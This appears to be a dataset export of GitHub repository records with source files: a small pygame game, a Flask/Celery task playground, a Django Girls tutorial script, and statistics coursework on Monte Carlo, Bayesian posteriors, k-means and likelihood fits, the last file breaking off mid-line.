repo_name
stringlengths
5
114
repo_url
stringlengths
24
133
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
directory_id
stringlengths
40
40
branch_name
stringclasses
209 values
visit_date
timestamp[ns]
revision_date
timestamp[ns]
committer_date
timestamp[ns]
github_id
int64
9.83k
683M
star_events_count
int64
0
22.6k
fork_events_count
int64
0
4.15k
gha_license_id
stringclasses
17 values
gha_created_at
timestamp[ns]
gha_updated_at
timestamp[ns]
gha_pushed_at
timestamp[ns]
gha_language
stringclasses
115 values
files
listlengths
1
13.2k
num_files
int64
1
13.2k
Salem200/Bermuda
https://github.com/Salem200/Bermuda
d614bf0203ef243cff5e257f2f627d54c0d2cb09
1b49b0fc63e235cfcfc7bd598ecfab75a8a916a0
69108dfa7e89e7e5cedd76defe8c9bea9dd995c1
refs/heads/master
2021-01-13T02:55:17.773780
2016-12-28T20:31:39
2016-12-28T20:31:39
77,087,983
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5481727719306946, "alphanum_fraction": 0.554817259311676, "avg_line_length": 32.44444274902344, "blob_id": "eecd71d00b1192d5b44720718169d7a78b04babd", "content_id": "bac4c452d1be6173696f3fd091c8909a3e933437", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 301, "license_type": "no_license", "max_line_length": 64, "num_lines": 9, "path": "/GameObject.py", "repo_name": "Salem200/Bermuda", "src_encoding": "UTF-8", "text": "class GameObject:\n def __init__(self, img, xPos, yPos, xSpeed = 0, ySpeed = 0):\n self.pos = img.get_rect().move(xPos, yPos)\n self.xSpeed = xSpeed\n self.ySpeed = ySpeed\n self.img = img\n\n def move(self):\n self.pos = self.pos.move(xSpeed * dT, ySpeed * dT)\n" }, { "alpha_fraction": 0.5447470545768738, "alphanum_fraction": 0.5687419176101685, "avg_line_length": 24.700000762939453, "blob_id": "4324771b89966d85c6d3eb75853db436ecc28db4", "content_id": "ab4f747cdb00b647b96ea2692d6639cd063497b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1542, "license_type": "no_license", "max_line_length": 85, "num_lines": 60, "path": "/main.py", "repo_name": "Salem200/Bermuda", "src_encoding": "UTF-8", "text": "import pygame, sys, time\nfrom pygame.locals import *\nimport GameObject\n\ndef main():\n pygame.init()\n\n wWidth = 800\n wHeight = 600\n\n WHITE = (255, 255, 255)\n anne = pygame.image.load(\"sprites/Anne_01.png\")\n annex4 = pygame.image.load(\"sprites/Anne_01_x4.png\")\n staffan = pygame.image.load(\"staffan.jpg\")\n staffanX = 1\n staffanY = 1\n xSpeed = 100 #px/s\n ySpeed = 100 #px/s\n\n #set up the window\n DISPLAYSURF = pygame.display.set_mode((wWidth, wHeight), 0, 32)\n pygame.display.set_caption(\"Bermuda\")\n\n #init previus time for delta calculation\n prevTime = pygame.time.get_ticks()\n global dT\n\n #main game loop\n while True:\n DISPLAYSURF.fill(WHITE)\n\n #calculate delta time\n currentTime = pygame.time.get_ticks()\n dT = currentTime - prevTime\n dT /= 1000 #convert from ms to s\n prevTime = currentTime\n \n #event handling loop\n for event in pygame.event.get():\n if event.type == QUIT or (event.type == KEYUP and event.key == K_ESCAPE):\n pygame.quit()\n sys.exit()\n\n #movement\n keys = pygame.key.get_pressed()\n if keys[K_RIGHT]:\n staffanX += xSpeed * dT\n if keys[K_LEFT]:\n staffanX -= xSpeed * dT\n if keys[K_UP]:\n staffanY -= ySpeed * dT\n if keys[K_DOWN]:\n staffanY += ySpeed * dT\n\n\n DISPLAYSURF.blit(annex4, (staffanX, staffanY))\n\n pygame.display.flip()\n\nif __name__ == \"__main__\": main()\n" }, { "alpha_fraction": 0.7894737124443054, "alphanum_fraction": 0.7894737124443054, "avg_line_length": 18, "blob_id": "b772cd25d3113b43f475802c77bddb1f43317047", "content_id": "1fd048807840ae36dcd2114985968b2c32e9465d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 38, "license_type": "no_license", "max_line_length": 27, "num_lines": 2, "path": "/README.md", "repo_name": "Salem200/Bermuda", "src_encoding": "UTF-8", "text": "# Bermuda\nSide-scrolling-pirate-em-up\n" } ]
3
devaljain1998/WorkCeleryPlayground
https://github.com/devaljain1998/WorkCeleryPlayground
0b64416bee67f6f03b01598b697fbf0835f2a820
7c69c2cd37d6dd6f0c31a1254beab35cbdd07521
699233dbbb4d168c0c7efb884dfd5d123e2b7e49
refs/heads/main
2023-02-27T06:58:44.340717
2021-02-04T08:31:06
2021-02-04T08:31:06
333,749,553
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6442764401435852, "alphanum_fraction": 0.6498920321464539, "avg_line_length": 33.55970001220703, "blob_id": "b8d98148ae3a1c24ba62f50bcf0f65d11512034d", "content_id": "0e1d18102accd0cf112bc2ba5375f5092a514c41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4630, "license_type": "no_license", "max_line_length": 109, "num_lines": 134, "path": "/app.py", "repo_name": "devaljain1998/WorkCeleryPlayground", "src_encoding": "UTF-8", "text": "from flask import Flask\nfrom celery_importer import make_celery\nfrom time import sleep\nfrom datetime import datetime\nimport celery\nfrom celery import chain, group\n\napp = Flask(__name__)\nbackend='rpc://'\nbroker='pyamqp://'\napp.config.update(\n # CELERY_BROKER_URL='amqp://localhost:15672',\n # CELERY_RESULT_BACKEND='rpc://'\n \n # TEST:\n CELERY_BROKER_URL = broker,\n CELERY_RESULT_BACKEND = backend\n)\ncelery_worker = make_celery(app)\n\[email protected]('/')\ndef hello_world():\n hello_world_on_a_different_queue_task.delay('Deval for a different Queue!')\n return 'Hello, World!'\n\[email protected]('/add/<int:a>/<int:b>', methods=['GET'])\ndef add_digits_route(a: int, b: int):\n # task_handler_task.delay()\n delay_task.delay()\n print(f'got: a={a}, b={b}')\n get_sum_of_digits = lambda a, b: int(a) + int(b)\n sum_of_digits = get_sum_of_digits(a, b)\n return f\"sum of {a} + {b} : {sum_of_digits}\"\n\[email protected]('/div/<int:a>/<int:b>', methods=['GET'])\ndef div_digits_route(a: int, b: int):\n print(f'got: a={a}, b={b}')\n divison_task.delay(a, b)\n return \"Called divison task!\"\n\n\n# CELERY TASKS: #\n# Task1: A normal celery task:\n@celery_worker.task(name=\"app.simple_delay_task\")\ndef delay_task(duration=10):\n try:\n print(f'Inside delay_task', f'time= {datetime.now()}')\n print(f\"Delaying task for {duration} duration.\")\n for i in range(duration):\n print(i + 1, \"seconds\")\n sleep(1)\n print('Delay completed!', datetime.now())\n return\n except celery.exceptions.SoftTimeLimitExceeded as e:\n print('Soft time limit exceed. Terminating!')\n\n# Task2: A Periodic Celery Task\n@celery_worker.task(name='app.simple_periodic_task')\ndef simple_periodic_task(name: str = 'Deval'):\n print(f'Hey {name}, How you doin?')\n current_time = datetime.now()\n print(f'Task completed at time: {current_time}')\n\n \n@celery_worker.task(name='app.every_2_min_repeating_task')\ndef every_2_min_repeating_task(name: str = 'Deval'):\n print(f'Hey {name}, How you doin?', \"let's meet after 2 min :)\")\n current_time = datetime.now()\n print(f'Task completed at time: {current_time}')\n\n \n# Task3: Calling Task with Task\n@celery_worker.task(name='app.task_handler')\ndef task_handler_task():\n print(\"Inside task_handler -> calling: delay_task\")\n delay_task.s().delay(duration=4)\n print(\"Completed delay_task, now back to task_handler\")\n\n# Task4: Different ways of executing a task in celery:\[email protected]('/greet/<name>/<int:delay>', methods=['GET'])\[email protected]('/greet/<name>/', methods=['GET'])\ndef greetings_route_with_different_methods(name, delay: int = 0):\n print(f'Inside', greetings_route_with_different_methods.__name__)\n print(f'Current time: ', datetime.now())\n if delay == 0:\n delay_task.delay()\n else:\n print(f'Now applying apply_async and it will be starting after countdown of {delay} seconds.')\n delay_task.apply_async((delay,), countdown=delay)\n \n return f'Hey {name}, How you doing?'\n\n# Task5: Adding task on a different queue:\n# cmd: celery -A app.celery_worker -l INFO -Q celery,queue2\n@celery_worker.task(name='app.hello_world_on_a_different_queue_task')\ndef hello_world_on_a_different_queue_task(name: str):\n print(f'Hello', name)\n \n# Task7: Retry task:\n@celery_worker.task(bind=True, name='app.divison_task')\ndef divison_task(self, a: int, b: int):\n print('Inside', divison_task.__name__)\n print('for', dict(a=a, b=b))\n try:\n quotient = a / b\n return quotient\n except ZeroDivisionError as exc:\n print('ZeroDivisonError occured for: ', dict(a=a, b=b))\n print('Now incrementing b')\n b += 1\n raise self.retry(exc = exc, countdown=3, max_retries=5)\n except Exception as e:\n print('Got another excpetion', 'now incrementing b', dict(a=a, b=b))\n divison_task.s().delay(a, b + 1)\n \n# POC: chain\n@celery_worker.task(name='app.string_printer')\ndef string_printer(string: str, other_string: str = None) -> str:\n current_string = string if not other_string else string+other_string\n print('Inside', string_printer.__name__)\n print(current_string)\n return current_string\n\[email protected]('/chain/addition/<initial_string>', methods=['GET'])\ndef chain_route(initial_string: str):\n print('Inside: ', chain_route.__name__)\n result = chain(\n string_printer.s(initial_string), string_printer.s(initial_string), string_printer.s(initial_string))\n result.delay()\n print('Called chain')\n # final_result = result.get()\n # print(final_result)\n # return final_result\n return 'TEST'" }, { "alpha_fraction": 0.6136363744735718, "alphanum_fraction": 0.6221590638160706, "avg_line_length": 22.5, "blob_id": "d060854efad426c47a7d38bf7cf03da20b322f6a", "content_id": "d786099136d059e57879902b39daaaafd7959a8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 704, "license_type": "no_license", "max_line_length": 68, "num_lines": 30, "path": "/celery_config.py", "repo_name": "devaljain1998/WorkCeleryPlayground", "src_encoding": "UTF-8", "text": "from celery.schedules import crontab\n\n\n# CELERY_IMPORTS = ('app.tasks.test')\nCELERY_TASK_RESULT_EXPIRES = 30\nCELERY_TIMEZONE = 'UTC'\n\nCELERY_ACCEPT_CONTENT = ['json', 'msgpack', 'yaml']\nCELERY_TASK_SERIALIZER = 'json'\nCELERY_RESULT_SERIALIZER = 'json'\n\n# TIME LIMITS:\nCELERYD_TASK_SOFT_TIME_LIMIT = 5\n\nCELERYBEAT_SCHEDULE = {\n 'test-celery': {\n 'task': 'app.simple_periodic_task',\n # Every minute\n 'schedule': crontab(minute=\"*\"),\n },\n 'every-five-minutes': {\n 'task': 'app.every_2_min_repeating_task',\n # Every minute\n 'schedule': crontab(minute=\"*/2\"),\n },\n}\n\nCELERY_ROUTES = {\n 'app.hello_world_on_a_different_queue_task': {'queue': 'queue2'}\n}" }, { "alpha_fraction": 0.5408719182014465, "alphanum_fraction": 0.7138964533805847, "avg_line_length": 18.83783721923828, "blob_id": "295edfb97116e576c88c3e16b4303e2c1bb4a7f4", "content_id": "03cdbf8e88d1c7643bc31bb6607ab91523b3f14b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 2202, "license_type": "no_license", "max_line_length": 38, "num_lines": 111, "path": "/requirements.txt", "repo_name": "devaljain1998/WorkCeleryPlayground", "src_encoding": "UTF-8", "text": "adal==1.2.4\namqp==2.6.1\nanyjson==0.3.3\nappnope==0.1.2\nattrs==20.3.0\nazure-batch==3.0.0\nazure-common==1.1.25\nazure-core==1.6.0\nazure-datalake-store==0.0.48\nazure-graphrbac==0.30.0\nazure-keyvault==0.3.7\nazure-mgmt==1.0.0\nazure-mgmt-authorization==0.30.0\nazure-mgmt-batch==4.0.0\nazure-mgmt-cdn==0.30.3\nazure-mgmt-cognitiveservices==1.0.0\nazure-mgmt-compute==1.0.0\nazure-mgmt-containerregistry==0.2.1\nazure-mgmt-datalake-analytics==0.1.6\nazure-mgmt-datalake-nspkg==3.0.1\nazure-mgmt-datalake-store==0.1.6\nazure-mgmt-devtestlabs==2.0.0\nazure-mgmt-dns==1.0.1\nazure-mgmt-documentdb==0.1.3\nazure-mgmt-iothub==0.2.2\nazure-mgmt-keyvault==0.31.0\nazure-mgmt-logic==2.1.0\nazure-mgmt-monitor==0.2.1\nazure-mgmt-network==1.0.0\nazure-mgmt-nspkg==3.0.2\nazure-mgmt-rdbms==0.1.0\nazure-mgmt-redis==4.1.1\nazure-mgmt-resource==1.1.0\nazure-mgmt-scheduler==1.1.3\nazure-mgmt-sql==0.5.3\nazure-mgmt-storage==1.0.0\nazure-mgmt-trafficmanager==0.30.0\nazure-mgmt-web==0.32.0\nazure-nspkg==3.0.2\nazure-servicebus==0.21.1\nazure-servicefabric==5.6.130\nazure-servicemanagement-legacy==0.20.7\nazure-storage==0.34.2\nbackcall==0.1.0\nbilliard==3.6.3.0\nbotocore==1.17.57\ncelery==4.3.0\ncertifi==2020.4.5.2\ncffi==1.14.0\nchardet==3.0.4\nclick==7.1.2\nclick-didyoumean==0.0.3\nclick-plugins==1.1.1\nclick-repl==0.1.6\ncryptography==2.9.2\ndecorator==4.4.2\ndocutils==0.15.2\nFlask==1.1.2\nfuture==0.18.2\ngevent==20.6.2\ngreenlet==0.4.16\nidna==2.9\niniconfig==1.1.1\nipython-genutils==0.2.0\nisodate==0.6.0\nitsdangerous==0.24\njedi==0.17.0\njeepney==0.4.3\nJinja2==2.11.2\njmespath==0.10.0\nkeyring==21.2.1\nkombu==4.6.11\nlinecache2==1.0.0\nMarkupSafe==1.1.1\nmarshmallow==3.5.0\nmsrest==0.6.15\nmsrestazure==0.4.34\noauthlib==3.1.0\npackaging==20.8\nparso==0.7.0\npexpect==4.8.0\npickleshare==0.7.5\npika==0.13.0\npluggy==0.13.1\nprompt-toolkit==3.0.5\nptyprocess==0.6.0\npy==1.10.0\nPyAMQP==0.1.0.7\npycodestyle==2.6.0\npycparser==2.20\nPygments==2.6.1\nPyJWT==1.7.1\npyOpenSSL==19.1.0\npyparsing==2.4.7\npytest==6.2.2\npython-dateutil==2.8.1\npytz==2020.1\nrequests==2.24.0\nrequests-oauthlib==1.3.0\ns3transfer==0.3.3\nsix==1.15.0\ntoml==0.10.1\ntraceback2==1.4.0\ntraitlets==4.3.3\nunittest2==1.1.0\nurllib3==1.25.9\nvine==1.3.0\nwcwidth==0.2.4\nWerkzeug==1.0.1\nzope.event==4.4\nzope.interface==5.1.0\n" }, { "alpha_fraction": 0.7111111283302307, "alphanum_fraction": 0.7333333492279053, "avg_line_length": 10.5, "blob_id": "02da66a5a0bb6689c3120cc4327c4ac291acffa3", "content_id": "0ce08a60a0524f65bf0546768fcb0d792ca1d98a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 45, "license_type": "no_license", "max_line_length": 27, "num_lines": 4, "path": "/run_py3_env.sh", "repo_name": "devaljain1998/WorkCeleryPlayground", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\nsource py3venv/bin/activate\ncode ." } ]
4
izaprzy/my-first-blog
https://github.com/izaprzy/my-first-blog
96b990985d8910ab5d5554f495b6771587e37c5d
ce460c218871c61dafa72e550c53fbb0ccc3cd02
70e653d7eee935fbacdce91e593cc1f81ee9ecf8
refs/heads/master
2020-06-10T03:17:28.913227
2017-03-30T13:51:36
2017-03-30T13:51:36
76,110,896
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5829596519470215, "alphanum_fraction": 0.5964125394821167, "avg_line_length": 17.58333396911621, "blob_id": "7a900253b6439274cd3050b73c8d39882e6c3f6d", "content_id": "ee43c22d4af14b6ddb9593df0f3c44b2daa35055", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 225, "license_type": "no_license", "max_line_length": 58, "num_lines": 12, "path": "/hello.py", "repo_name": "izaprzy/my-first-blog", "src_encoding": "UTF-8", "text": "def hej(imie):\n print('Hej ' + imie + '!')\n\n\ndziewczyny = [\"Iza\", \"Ania\", \"Sonia\", \"Patrycja\", \"Kasia\"]\nfor imie in dziewczyny:\n hej(imie)\n print(\"Witamy kolejną uczestniczkę\")\n\n\nfor i in range(1,10):\n print(i)\n" }, { "alpha_fraction": 0.8152173757553101, "alphanum_fraction": 0.8152173757553101, "avg_line_length": 91, "blob_id": "2e4f12b3b15b4d79f12bec816e6b1ade9e492a43", "content_id": "f9445ba34a68f38fc3b5741b55452308e068c4da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 184, "license_type": "no_license", "max_line_length": 140, "num_lines": 2, "path": "/README.md", "repo_name": "izaprzy/my-first-blog", "src_encoding": "UTF-8", "text": "One-day programming with Django Girls - a non-profit organization and a community that empowers and helps women to organize free workshops \nby providing tools, resources and support.\n" } ]
2
DanielRamyar/AdvancedMethodsInAppliedStatistics
https://github.com/DanielRamyar/AdvancedMethodsInAppliedStatistics
15bb321c47e5731fa387dbc9451efcbc76a5d141
816751ed91777e32382092e1a263c2fa37e5d0a7
f31afbcf72d524ad12f7e4715648ef95748316c7
refs/heads/master
2020-05-03T04:18:00.192206
2019-04-05T06:32:28
2019-04-05T06:32:28
178,417,752
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6128491759300232, "alphanum_fraction": 0.6474860310554504, "avg_line_length": 29.86206817626953, "blob_id": "76085705c3dfeb4d3c630629d30311d759ef7d7e", "content_id": "43bf0f5b555fc08e525f6350b01a27e034bde4f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1790, "license_type": "no_license", "max_line_length": 121, "num_lines": 58, "path": "/Week_2/Class_4/bayes_3.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport math\nimport matplotlib.pyplot as plt\n\n\nk = 4\nbig_k = 50\nn = 30\n\n\ndef my_binomial_coefficient(n, k):\n result = math.factorial(n) / (math.factorial(k) * math.factorial(n - k))\n return result\n\ndef my_hypergeo(k, K, n, N):\n result = my_binomial_coefficient(K, k) * my_binomial_coefficient(N - K, n - k) / my_binomial_coefficient(N, n)\n return result\n\ndef my_gauss(x, mu, sigma):\n result = 1/(np.sqrt(2 * np.pi * sigma ** 2)) * np.exp(-(x - mu) ** 2 / (2 * sigma ** 2))\n return result\n\n\nposterior_flat = np.array([])\nposterior = np.array([])\nprior = np.array([])\nmu = 500\nsigma = 500 * np.sqrt((300/5000) ** 2 + (1/10) ** 2)\nmy_start = big_k + n - k\n\n\nfor i in np.arange(my_start, 2000):\n temp = my_hypergeo(k, big_k, n, i)\n \n posterior = np.append(posterior, temp * my_gauss(i, mu, sigma))\n posterior_flat = np.append(posterior_flat, temp)\n\n prior = np.append(prior, my_gauss(i, mu, sigma))\n\nk=8\nposterior_flat_newk = np.array([])\nposterior_newk = np.array([])\nfor i in np.arange(my_start, 2000):\n temp = my_hypergeo(k, big_k, n, i)\n \n posterior_newk = np.append(posterior_newk, temp * my_gauss(i, mu, sigma))\n posterior_flat_newk = np.append(posterior_flat_newk, temp)\n\n\n\nplt.plot(np.arange(my_start, 2000), posterior_flat/np.sum(posterior_flat), 'r', label='flat/LLH k=4')\nplt.plot(np.arange(my_start, 2000), posterior/np.sum(posterior), 'r', linestyle='dashed', label='gaussian k=4')\n\nplt.plot(np.arange(my_start, 2000), posterior_flat_newk/np.sum(posterior_flat_newk), 'b', label='flat/LLH k=8')\nplt.plot(np.arange(my_start, 2000), posterior_newk/np.sum(posterior_newk), 'b', linestyle='dashed', label='gaussian k=8')\nplt.plot(np.arange(my_start, 2000), prior/np.sum(prior), 'k', label='prior')\nplt.legend()\nplt.show()\n" }, { "alpha_fraction": 0.4951871633529663, "alphanum_fraction": 0.5657753944396973, "avg_line_length": 23.605262756347656, "blob_id": "c68fcec1146748ed56057ec1080557c92002d3e2", "content_id": "85e2d0a77d06328cca9736154357f7d2eaf7d532", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 935, "license_type": "no_license", "max_line_length": 74, "num_lines": 38, "path": "/Week_1/Class_2/mc_pi_precision.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import random\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nrandom.seed(142)\n\n# N is the number of throws per test\nN = 100000\nnumber_of_tests = 1\npi = np.empty((1, 0))\ncounter = 1\n# Fill my arrays with random numbers\nfor i in range(number_of_tests):\n\n x = np.empty((1, 0))\n y = np.empty((1, 0))\n x_missed = np.empty((1, 0))\n y_missed = np.empty((1, 0))\n\n for i in range(N):\n\n x_random = random.random()\n y_random = random.random()\n if (np.sqrt(x_random**2 + y_random**2)) < 1:\n x = np.append(x, x_random)\n y = np.append(y, y_random)\n\n else:\n x_missed = np.append(x_missed, x_random)\n y_missed = np.append(y_missed, y_random)\n\n if counter in [10, 100, 1000, 10000, 100000]:\n pi = np.append(pi, len(x) / counter * 4)\n counter += 1\n\n\nplt.plot([10, 100, 1000, 10000, 100000], pi, marker='o', linestyle='None')\nplt.show()\n" }, { "alpha_fraction": 0.5275827646255493, "alphanum_fraction": 0.5576730370521545, "avg_line_length": 20.23404312133789, "blob_id": "96ebfdaf69f2ccc2d003777a454c4cc3ddd327be", "content_id": "1438f62cb29708b00566e5881c75bcfeee80f8aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 997, "license_type": "no_license", "max_line_length": 76, "num_lines": 47, "path": "/Project/test.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\n\nA = np.array([[1., 2, 3],\n [5, 4, 2],\n [11, 8, 9],\n [4, 7, 1]])\nA = np.insert(A, 0, np.ones(A.shape[0]), axis=1)\nA = np.insert(A, 0, np.zeros(A.shape[0]), axis=1)\n\n\nindex = np.random.randint(len(A), size=(2))\ninit_cent = A[index, :]\n\n\nprint(init_cent)\n\n\n\ndef dist_centroids(data, cent):\n '''\n Returns the distance between each point (each row in data) and centroids\n '''\n dist = []\n for i in range(cent.shape[0]):\n print(cent[i, 1::], 'lknl')\n temp = np.linalg.norm(data[:, 2::] - cent[i, 2::], axis=1)\n dist = np.append(dist, temp)\n print(dist.shape)\n dist = dist.reshape((cent.shape[0], data.shape[0])).T\n return dist\n\ndef label_centroids(data, dist):\n '''\n Adds Label to data according to its closest centroid\n '''\n\n temp = np.argmin(dist, axis=1) + 1\n\n data[:, 0] = temp\n\n return data\n\n\ndisto = dist_centroids(A, init_cent)\nprint(A)\nA = label_centroids(A, disto)\nprint(A)" }, { "alpha_fraction": 0.6238532066345215, "alphanum_fraction": 0.6720183491706848, "avg_line_length": 20.799999237060547, "blob_id": "d626b20e96e49037a4138445f307472275801813", "content_id": "50f8ec8accca9739d00f43f9a33b48cb31abe73e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 436, "license_type": "no_license", "max_line_length": 95, "num_lines": 20, "path": "/Week_3/Class_6/coin_flip_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport math\nimport matplotlib.pyplot as plt\nfrom scipy.stats import beta\nfrom scipy.stats import binom\n\n\na = 5\nb = 17\ntheta = np.linspace(0, 1, 1000)\n\nn = 100\nk = 66\n\n\nplt.plot(theta, beta.pdf(theta, a, b), 'k', label='prior')\nplt.plot(theta, binom.pmf(k, n, theta) * 10, 'b', label='likelyhood')\nplt.plot(theta, beta.pdf(theta, a, b) * binom.pmf(k, n, theta) * 10000, 'r', label='posterior')\nplt.legend()\nplt.show()\n" }, { "alpha_fraction": 0.5172358751296997, "alphanum_fraction": 0.5675805807113647, "avg_line_length": 25.544681549072266, "blob_id": "c0278cc2f97beb5e9cf896fdb71956754f09227f", "content_id": "0c8d903a3794911c3fb7254c44cccb0177164eb5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6237, "license_type": "no_license", "max_line_length": 87, "num_lines": 235, "path": "/Exam_2019/Code/Problem_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import minimize\nfrom scipy.stats import chisquare, chi2, binom, poisson\nimport random\nfrom scipy import integrate\n\n\ndef f_1(x, a):\n return (1 / (x + 5)) * np.sin(a * x)\n\n\ndef f_2(x, a):\n return np.sin(a * x) + 1\n\n\ndef f_3(x, a):\n return np.sin(a * (x ** 2))\n\n\ndef f_4(x, a):\n return np.sin(a * x + 1) ** 2\n\n\ndef f_5(x):\n return x * np.tan(x)\n\n\ndef f_6(x, a, b):\n return (1 + a * x + b * (x ** 2)) / ((2/3) * (b + 3))\n\n\ndef f_7(x, a, b):\n return a + b * x\n\n\ndef f_8(x, a, b, c):\n return (np.sin(a * x) + c * np.exp(b * x) + 1)\n\n\ndef f_9(x, a, b):\n normz = (np.sqrt(2 * np.pi) * np.abs(b))\n my_func = np.exp(-(x - a) ** 2 / (2 * (b ** 2))) / normz\n return my_func\n\n\ndef my_pdf1(VAR, x):\n a, b = VAR\n\n pdf = f_6(x, a, b)\n\n ln_pdf = np.log((pdf))\n result = np.sum(-ln_pdf)\n return result\n\n\ndef my_pdf2(VAR, k):\n mu = VAR\n\n pdf = poisson.pmf(k, mu)\n\n ln_pdf = np.log((pdf))\n result = np.sum(-ln_pdf)\n return result\n\n\ndef my_pdf3(VAR, x):\n a, b, c = VAR\n\n normz = integrate.quad(f_8, 20, 27, args=(a, b, c))\n\n pdf = f_8(x, a, b, c) / normz[0]\n\n ln_pdf = np.log((pdf))\n result = np.sum(-ln_pdf)\n return result\n\ndef my_pdf4(VAR, k):\n p = VAR\n\n pdf = binom.pmf(k, 5000, p)\n\n ln_pdf = np.log((pdf))\n result = np.sum(-ln_pdf)\n return result\n\n\nfname = 'Exam_2019_Prob1.txt'\ndata = np.loadtxt(fname)\n\n\nz0 = data[:, 0]\nz1 = data[:, 1]\nz2 = data[:, 2]\n\na_bound = (0, 10)\nb_bound = (-10, 10)\nc_bound = (4000, 8000)\n\nn_bound = (0, None)\np_bound = (0, None)\n\nmu_bound = (0, None)\n\ndata_0 = minimize(my_pdf3, [4, -0.1, 4150], args=(z0), method='SLSQP',\n bounds=(a_bound, b_bound, c_bound))\n\ndata_1 = minimize(my_pdf1, [1, 1], args=(z1), method='SLSQP',\n bounds=(a_bound, b_bound))\n\ndata_2 = minimize(my_pdf2, [1, ], args=(z2), method='SLSQP',\n bounds=(mu_bound, ))\n\ndata_3 = minimize(my_pdf4, [0.001, ], args=(z2), method='SLSQP',\n bounds=((0, None), ))\n\n\nprint(data_0)\nprint(data_1)\nprint(data_2)\nprint('spe')\nprint(data_3)\n\n\n###############################################################################\nbinwidth = 0.05\nn_bins = np.arange(min(z1), max(z1) + binwidth, binwidth)\n\n# Chi2 calculator\nobserved_values, bins, _ = plt.hist(z1, bins=n_bins)\nplt.close()\n# We normalize by multiplyting the length of the data with the binwidth\nexpected_values = f_6(bins[:-1], data_1.x[0], data_1.x[1]) * len(z1) * binwidth\n\nprint(observed_values)\nprint(expected_values)\nmy_chi = chisquare(observed_values,\n f_exp=expected_values)\nprint(my_chi)\nprint('Threshold value ', chi2.isf(0.05, len(expected_values)-2))\n\nprint(len(expected_values)-2)\nplt.figure()\nplt.hist(z1, bins=n_bins, normed=True, label='Data Column 2')\nx = np.arange(-1, 1, 0.01)\ny = f_6(x, data_1.x[0], data_1.x[1]) \nfit1_label = ('Fit: $1+ax+bx^2$, a=%.02f, b=%.02f \\n$\\chi^2=%.02f$' %\n (data_1.x[0], data_1.x[1], my_chi[0]))\nplt.plot(x,y, label=fit1_label, color='r')\nplt.legend()\nplt.savefig('prob1_Column2.pdf')\n# plt.show()\n###############################################################################\nprint('Data 2 starts here')\nbinwidth = 0.1\nn_bins = np.arange(min(z2), max(z2) + binwidth, binwidth)\n\n# Chi2 calculator\nobserved_values, bins, _ = plt.hist(z2, bins=n_bins, label='Data Column 3')\nasdasd = np.arange(0, 22.1, 0.1)\nexpected_values = poisson.pmf(asdasd, data_2.x[0]) * len(z2)\nplt.close()\nprint(observed_values[observed_values != 0])\nprint(expected_values[expected_values != 0][:-1])\n\nmy_chi = chisquare(observed_values[observed_values != 0],\n f_exp=expected_values[expected_values != 0][1:])\nprint(my_chi)\nprint('Threshold value ', chi2.isf(0.05,\n len(expected_values[expected_values != 0][1:]) - 1))\n\nprint(len(expected_values[expected_values != 0][1:]) - 1, 'sdlkfnlsdknf')\n\nplt.hist(z2, bins=n_bins+0.05, label='Data Column 3')\nx = np.arange(0, len(expected_values[expected_values != 0][1:]), 1)\nfit1_label = ('Fit: Poisson distribution,\\n$\\mu$=%.02f, \\n$\\chi^2=%.02f$' %\n (data_2.x[0], my_chi[0]))\nplt.plot(x+1, expected_values[expected_values != 0][1:], 'ro', label=fit1_label)\nplt.legend()\nplt.savefig('prob1_Column3.pdf')\n\n# plt.show()\n\n\n###############################################################################\nprint('Data 1 starts here')\nplt.figure()\nbinwidth = 0.1\nn_bins = np.arange(min(z0), max(z0) + binwidth, binwidth)\n\n# Chi2 calculator\nobserved_values, bins, _ = plt.hist(z0, bins=n_bins)\n\nnormz = integrate.quad(f_8, 20, 27, args=(data_0.x[0], data_0.x[1], data_0.x[2]))\n# # We normalize by multiplyting the length of the data with the binwidth\nexpected_values = (f_8(bins[:-1], data_0.x[0], data_0.x[1], data_0.x[2]) / normz[0] *\n len(z0) * binwidth)\nplt.close()\nprint(observed_values)\nprint(expected_values)\nmy_chi = chisquare(observed_values,\n f_exp=expected_values)\nprint(my_chi)\nprint('Threshold value ', chi2.isf(0.05, len(expected_values) - 3))\nprint(len(expected_values) - 3)\nplt.figure()\n\nplt.hist(z0, bins=n_bins, normed=True, label='Data Column 2')\nx = np.arange(20, 27, 0.01)\ny = f_8(x, data_0.x[0], data_0.x[1], data_0.x[2])/normz[0]\n\n\nfit1_label = ('Fit: $sin(ax)+ce^{bx}+1$,\\na=%.02f, b=%.02f, c=%.05f \\n$\\chi^2=%.02f$' 